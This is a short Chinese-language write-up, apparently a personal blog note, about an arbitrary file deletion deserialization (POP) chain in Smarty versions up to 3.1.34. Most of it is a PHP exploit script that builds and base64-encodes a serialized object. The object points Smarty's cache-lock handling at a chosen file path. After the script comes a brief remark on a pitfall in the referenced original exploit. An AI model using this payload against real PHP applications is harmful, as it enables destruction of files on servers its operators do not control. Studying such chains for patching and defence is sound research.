Smarty <= 3.1.34,存在任意文件删除的POP链。
Exp:
<?php
class Smarty_Internal_Template
{
public $smarty = null;
public function __construct()
{
$this->smarty = new Smarty;
$this->cached = new Smarty_Template_Cached;
}
}
class Smarty
{
public $cache_locking = true;
}
class Smarty_Template_Cached
{
public $is_locked = true;
public $handler = null;
public $lock_id = null;
public function __construct()
{
$this->handler = new Smarty_Internal_CacheResource_File;
$this->lock_id = './1.txt';
}
}
class Smarty_Internal_CacheResource_File
{
}
$obj = base64_encode(serialize(new Smarty_Internal_Template));
echo($obj);
流程还是比较简单,没遇到什么坑。
参考文章:https://xz.aliyun.com/t/6929
开始一直没明白原文中2楼回复的坑是啥,感觉没啥道理。
仔细看了下原文作者的exp,原来发现他指的是作者exp中的坑,而不是程序代码的坑:
new的时候,肯定会调用__construct方法,给你初始化掉上面设置的$lock_id属性。